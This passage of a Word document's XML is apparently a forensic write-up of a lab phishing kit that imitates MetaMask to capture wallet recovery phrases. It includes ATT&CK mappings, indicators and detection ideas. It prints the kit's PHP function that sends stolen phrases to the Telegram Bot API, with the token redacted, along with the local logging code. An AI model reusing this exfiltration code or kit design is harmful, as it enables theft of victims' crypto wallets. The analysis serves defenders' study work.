        <w:t>Exfiltration and Local Storage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The handler assembled the wallet name, phrase, IP address, location, and User-Agent into a message. It then transmitted the record using Telegram and retained a local copy of the submitted phrase.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Telegram Transmission</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:shd w:fill="F1F3F5"/>
      </w:pPr>
      <w:r>
        <w:t>function sendTel($message) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  $id = "[REDACTED_CHAT_ID]";</w:t>
        <w:br/>
        <w:t xml:space="preserve">  $token = "[REDACTED_BOT_TOKEN]";</w:t>
        <w:br/>
        <w:t xml:space="preserve">  $url = "https://api.telegram.org/bot" . $token</w:t>
        <w:br/>
        <w:t xml:space="preserve">       . "/sendMessage?chat_id=" . $id</w:t>
        <w:br/>
        <w:t xml:space="preserve">       . "&amp;text=" . urlencode($message);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  file_get_contents($url);</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The public Telegram Bot API provided a legitimate web service that the kit abused as an exfiltration channel. Hard-coded bot credentials and a chat identifier were recovered from the evidence but are omitted from this public report.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Append Only Local Storage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:shd w:fill="F1F3F5"/>
      </w:pPr>
      <w:r>
        <w:t>file_put_contents(</w:t>
        <w:br/>
        <w:t xml:space="preserve">  $_SERVER['DOCUMENT_ROOT'] . '/log/log.txt',</w:t>
        <w:br/>
        <w:t xml:space="preserve">  $text,</w:t>
        <w:br/>
        <w:t xml:space="preserve">  FILE_APPEND</w:t>
        <w:br/>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>FILE_APPEND caused new records to be added to the end of the log rather than overwriting earlier entries. This behavior was later used to interpret record ordering.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Stored Victim Records</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The supplied log contained three non-empty records. Each record was a complete 12-word recovery phrase. The actual phrase values are visible in the controlled lab evidence but should be treated as sensitive credential material in real investigations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="6080760" cy="1071500"/>
            <wp:docPr id="4" name="Picture 4"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="04-collected-seed-phrases-log.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6080760" cy="1071500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FigureCaption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Figure 3  Three retained recovery-phrase records in log.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Record Count Validation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:shd w:fill="F1F3F5"/>
      </w:pPr>
      <w:r>
        <w:t>awk 'NF {count++} END {print count}' \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ./temp_extract_dir/pankewk/log/log.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Most Recent Record Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The final line was assessed as the most recently stored record because the handler used append-only writing. The log did not contain timestamps, so this conclusion is an inference supported by the source-code behavior rather than direct timestamp evidence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:shd w:fill="F1F3F5"/>
      </w:pPr>
      <w:r>
        <w:t>tail -n 1 ./temp_extract_dir/pankewk/log/log.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Attack Flow Reconstruction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="6217920" cy="3499439"/>
            <wp:docPr id="5" name="Picture 5"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="05-grabthephisher-attack-flow.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6217920" cy="3499439"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FigureCaption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Figure 4  Reconstructed collection, enrichment, exfiltration, and storage flow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="403" w:hanging="317"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:t>A victim reaches a page that imitates the MetaMask wallet interface.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="403" w:hanging="317"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:t>The page asks the victim to enter a 12-word seed phrase.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="403" w:hanging="317"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:t>Client-side JavaScript submits the phrase to metamask.php.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="403" w:hanging="317"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:t>The handler reads the source IP and User-Agent from the web request.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="403" w:hanging="317"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:t>Sypex Geo returns the country and city associated with the source IP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="403" w:hanging="317"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r>
        <w:t>The complete record is transmitted through the Telegram Bot API.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="403" w:hanging="317"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">7. </w:t>
      </w:r>
      <w:r>
        <w:t>The phrase is appended to log/log.txt as a local copy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>MITRE ATTACK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728"/>
            <w:shd w:fill="17365D"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3528"/>
            <w:shd w:fill="17365D"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4536"/>
            <w:shd w:fill="17365D"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Credential Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3528"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>T1056.003 Input Capture Web Portal Capture</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4536"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>The fake wallet page collected a submitted recovery phrase.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F3F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3528"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F3F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>T1614 System Location Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4536"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F3F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>An online IP-geolocation service returned country and city information.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3528"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>T1005 Data from Local System</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4536"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Captured phrases were retained in a local server-side log.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F3F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3528"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F3F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>T1567.004 Exfiltration Over Webhook</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4536"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F3F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Collected data was sent through the Telegram Bot API.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:t>These mappings describe the observed behavior at a high level. Exact ATT&amp;CK applicability depends on the deployment context and should not be treated as proof of a specific threat group.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Indicators and Artifacts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952"/>
            <w:shd w:fill="17365D"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6840"/>
            <w:shd w:fill="17365D"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2952"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>External service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6840"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>api.sypexgeo.net</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2952"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F3F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Exfiltration service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6840"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F3F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>api.telegram.org</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2952"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Phishing interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6840"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>metamask/index.html</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2952"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F3F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Collection handler</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6840"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F3F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>metamask/metamask.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2952"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Local record store</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6840"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>log/log.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2952"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F3F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Sensitive field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6840"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F3F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>.import-account__secret-phrase</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Detection Opportunities</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Alert on public web servers making requests to Telegram Bot API sendMessage endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Monitor newly deployed PHP files that read POST data together with REMOTE_ADDR and HTTP_USER_AGENT.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Search web roots for hard-coded bot tokens, chat identifiers, and wallet-brand impersonation assets.</w:t>
